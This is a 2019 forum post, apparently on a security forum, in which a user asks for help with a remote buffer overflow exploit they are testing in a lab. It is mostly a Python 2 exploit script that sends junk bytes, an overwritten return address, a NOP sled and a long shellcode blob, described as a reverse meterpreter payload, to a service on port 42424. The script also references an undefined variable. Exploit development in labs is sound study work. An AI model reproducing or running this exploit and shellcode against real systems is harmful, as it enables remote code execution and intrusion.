confuscious1080 Posted October 6, 2019 Share Posted October 6, 2019 Hi I am attempting to exploit a remote buffer overflow as part of a test lab environment. The exploit works fine in a Windows 7 test VM and i can get a reverse meterpreter to my Kali Linux VM with ASLR turned off on the Windows VM. However when I attempt this in the test environment against the machine that I know is running the application on port 42424 I do not get the reverses shell now i have tried this with both x86 and x64 shellcode, if i test locally on the Kali machine i can crash the application but again also do not get a shell my exploit code is below #!/usr/bin/env python2 import socket ServiceManagerIP = "127.0.0.1" ServiceManagerPort = 42424 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ServiceManagerIP, ServiceManagerPort)) payload = "\xc3"*146 #Junk Bytes #77E9F7DF payload += "\xDF\xF7\xE9\x77" + "\x90" *16 #Shellcode to be executed by application payload += ("\xdb\xca\xd9\x74\x24\xf4\xb8\x0b\x9d\x83\x98\x5f\x2b\xc9\xb1" "\x52\x83\xc7\x04\x31\x47\x13\x03\x4c\x8e\x61\x6d\xae\x58\xe7" "\x8e\x4e\x99\x88\x07\xab\xa8\x88\x7c\xb8\x9b\x38\xf6\xec\x17" "\xb2\x5a\x04\xa3\xb6\x72\x2b\x04\x7c\xa5\x02\x95\x2d\x95\x05" "\x15\x2c\xca\xe5\x24\xff\x1f\xe4\x61\xe2\xd2\xb4\x3a\x68\x40" "\x28\x4e\x24\x59\xc3\x1c\xa8\xd9\x30\xd4\xcb\xc8\xe7\x6e\x92" "\xca\x06\xa2\xae\x42\x10\xa7\x8b\x1d\xab\x13\x67\x9c\x7d\x6a" "\x88\x33\x40\x42\x7b\x4d\x85\x65\x64\x38\xff\x95\x19\x3b\xc4" "\xe4\xc5\xce\xde\x4f\x8d\x69\x3a\x71\x42\xef\xc9\x7d\x2f\x7b" "\x95\x61\xae\xa8\xae\x9e\x3b\x4f\x60\x17\x7f\x74\xa4\x73\xdb" "\x15\xfd\xd9\x8a\x2a\x1d\x82\x73\x8f\x56\x2f\x67\xa2\x35\x38" "\x44\x8f\xc5\xb8\xc2\x98\xb6\x8a\x4d\x33\x50\xa7\x06\x9d\xa7" "\xc8\x3c\x59\x37\x37\xbf\x9a\x1e\xfc\xeb\xca\x08\xd5\x93\x80" "\xc8\xda\x41\x06\x98\x74\x3a\xe7\x48\x35\xea\x8f\x82\xba\xd5" "\xb0\xad\x10\x7e\x5a\x54\xf3\x41\x33\x39\x82\x2a\x46\xc5\x9a" "\xcb\xcf\x23\xc8\x1b\x86\xfc\x65\x85\x83\x76\x17\x4a\x1e\xf3" "\x17\xc0\xad\x04\xd9\x21\xdb\x16\x8e\xc1\x96\x44\x19\xdd\x0c" "\xe0\xc5\x4c\xcb\xf0\x80\x6c\x44\xa7\xc5\x43\x9d\x2d\xf8\xfa" "\x37\x53\x01\x9a\x70\xd7\xde\x5f\x7e\xd6\x93\xe4\xa4\xc8\x6d" "\xe4\xe0\xbc\x21\xb3\xbe\x6a\x84\x6d\x71\xc4\x5e\xc1\xdb\x80" "\x27\x29\xdc\xd6\x27\x64\xaa\x36\x99\xd1\xeb\x49\x16\xb6\xfb" "\x32\x4a\x26\x03\xe9\xce\x56\x4e\xb3\x67\xff\x17\x26\x3a\x62" "\xa8\x9d\x79\x9b\x2b\x17\x02\x58\x33\x52\x07\x24\xf3\x8f\x75" "\x35\x96\xaf\x2a\x36\xb3") s.send(payload+"\r\n") data = s.recv(len(msg)) s.recv(1024) s.close() print data Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.